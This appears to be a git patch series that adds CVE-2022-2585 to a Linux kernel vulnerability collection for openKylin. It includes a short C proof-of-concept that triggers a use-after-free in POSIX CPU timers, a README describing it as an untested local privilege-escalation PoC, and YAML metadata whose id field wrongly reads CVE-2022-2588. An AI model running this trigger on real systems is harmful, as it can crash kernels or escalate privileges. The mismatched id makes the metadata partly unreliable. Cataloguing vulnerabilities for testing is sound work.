From cde79f2929eabbab3999219d8890af24a3d2416e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?= Date: Thu, 16 Mar 2023 09:08:28 +0000 Subject: [PATCH 1/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-2585?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-2585/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2022/CVE-2022-2585/.keep diff --git a/cve/linux-kernel/2022/CVE-2022-2585/.keep b/cve/linux-kernel/2022/CVE-2022-2585/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 31f78796023d0f18c51a34d185cdfbc80249b4e0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?= Date: Thu, 16 Mar 2023 09:08:43 +0000 Subject: [PATCH 2/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?linux-kernel/2022/CVE-2022-2585/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-2585/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-2585/.keep diff --git a/cve/linux-kernel/2022/CVE-2022-2585/.keep b/cve/linux-kernel/2022/CVE-2022-2585/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From bbc222eb69edf3997ba392712b349268b7d2e041 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?= Date: Thu, 16 Mar 2023 09:09:12 +0000 Subject: [PATCH 3/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-2585?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-2585/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2022/CVE-2022-2585/.keep diff --git a/cve/linux-kernel/2022/CVE-2022-2585/.keep b/cve/linux-kernel/2022/CVE-2022-2585/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 010611cb389e4366225ed3ed22c4ecd1951fbe8d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?= Date: Thu, 16 Mar 2023 09:09:38 +0000 Subject: [PATCH 4/7] =?UTF-8?q?=E6=B7=BB=E5=8A=A0=E4=BA=86Linux-Kernel?= =?UTF-8?q?=E7=9A=84CVE-2022-2585=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 侯鹏林 --- .../2022/CVE-2022-2585/CVE-2022-2585.c | 46 +++++++++++++++++++ cve/linux-kernel/2022/CVE-2022-2585/README.md | 17 +++++++ 2 files changed, 63 insertions(+) create mode 100644 cve/linux-kernel/2022/CVE-2022-2585/CVE-2022-2585.c create mode 100644 cve/linux-kernel/2022/CVE-2022-2585/README.md diff --git a/cve/linux-kernel/2022/CVE-2022-2585/CVE-2022-2585.c b/cve/linux-kernel/2022/CVE-2022-2585/CVE-2022-2585.c new file mode 100644 index 00000000..3cd22a03 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-2585/CVE-2022-2585.c @@ -0,0 +1,46 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include + +static int timer_uaf(void *d) +{ + timer_t tid; + struct itimerspec its; + + its.it_interval.tv_sec = 3; + its.it_interval.tv_nsec = 0; + its.it_value.tv_sec = 3; + its.it_value.tv_nsec = 0; + timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &tid); + timer_settime(tid, 0, &its, NULL); + execlp("./poc", "poc1", NULL); +} + +static char stack[8192]; + +int main(int argc, char **argv) +{ + timer_t tid; + int i; + + if (!strcmp(argv[0], "poc1")) { + sleep(2); + exit(0); + } + + if (fork() > 0) { + waitpid(-1, NULL, 0); + exit(0); + } + + clone(timer_uaf, stack+4096, SIGCHLD | CLONE_VM | CLONE_SIGHAND | CLONE_THREAD, NULL, NULL, NULL); + + while(1); + + return 0; +} diff --git a/cve/linux-kernel/2022/CVE-2022-2585/README.md b/cve/linux-kernel/2022/CVE-2022-2585/README.md new file mode 100644 index 00000000..297b795d --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-2585/README.md @@ -0,0 +1,17 @@ +# 2022-LPE-UAF + +Untested POC code + + +Security researchers discovered 3 vulnerabilities in the Linux kernel that could allow a local attacker to elevate privileges and potentially execute malicious code. The proof-of-concept code is publicly available increasing the likelihood of exploitation in the wild. + +##### Paper on Dirtycred by Zhenpeng +https://zplin.me/papers/DirtyCred-Zhenpeng.pdf + +Patches for DirtyCred and the public release of the PoC https://github.com/Markakd/DirtyCred + +CVE-2022-2585 - Linux kernel POSIX CPU timer UAF 'PoC' code source: +https://seclists.org/oss-sec/2022/q3/133 + +Linux kernel cls_route UAF 'PoC' code source: +https://seclists.org/oss-sec/2022/q3/132 -- Gitee From c4a48e182fffe523f892bf7e8badb0fe14ef259f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?= Date: Thu, 16 Mar 2023 09:09:46 +0000 Subject: [PATCH 5/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?linux-kernel/2022/CVE-2022-2585/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-2585/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-2585/.keep diff --git a/cve/linux-kernel/2022/CVE-2022-2585/.keep b/cve/linux-kernel/2022/CVE-2022-2585/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 7a576d8889e2297a5444927f045510dd357ed078 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?= Date: Thu, 16 Mar 2023 09:10:17 +0000 Subject: [PATCH 6/7] =?UTF-8?q?CVE-2022-2585=E7=9A=84yaml=E6=96=87?= =?UTF-8?q?=E4=BB=B6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 侯鹏林 --- cve/linux-kernel/2022/yaml/CVE-2022-2585.yaml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cve/linux-kernel/2022/yaml/CVE-2022-2585.yaml diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2585.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2585.yaml new file mode 100644 index 00000000..ca0e808a --- /dev/null +++ b/cve/linux-kernel/2022/yaml/CVE-2022-2585.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-2588 +source: https://github.com/Markakd/CVE-2022-2588 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + A use-after-free flaw was found in the Linux kernel’s POSIX CPU timers functionality in the way a user creates and then deletes the timer in the non-leader thread of the program. This flaw allows a local user to crash or potentially escalate their privileges on the system. + scope-of-influence: + Red Hat Enterprise Linux 9 + reference: + - https://access.redhat.com/security/cve/cve-2022-2585 + - https://ubuntu.com/security/CVE-2022-2585 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-2585 + cwe-id: CWE-416 + cnvd-id: NONE + kve-id: NONE + tags: UAF, 拒绝服务, 权限提升 \ No newline at end of file -- Gitee From 6a5ef2412bea7ec9d6e0bc87c9daf458d1eb9313 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BE=AF=E9=B9=8F=E6=9E=97?= Date: Thu, 16 Mar 2023 09:11:28 +0000 Subject: [PATCH 7/7] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 侯鹏林 --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index dfa49367..7a03b6ab 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -54,6 +54,7 @@ cve: - CVE-2022-25265 - CVE-2022-41218 - CVE-2019-13272 + - CVE-2022-2585 sudo: - CVE-2021-3156 - CVE-2023-22809 -- Gitee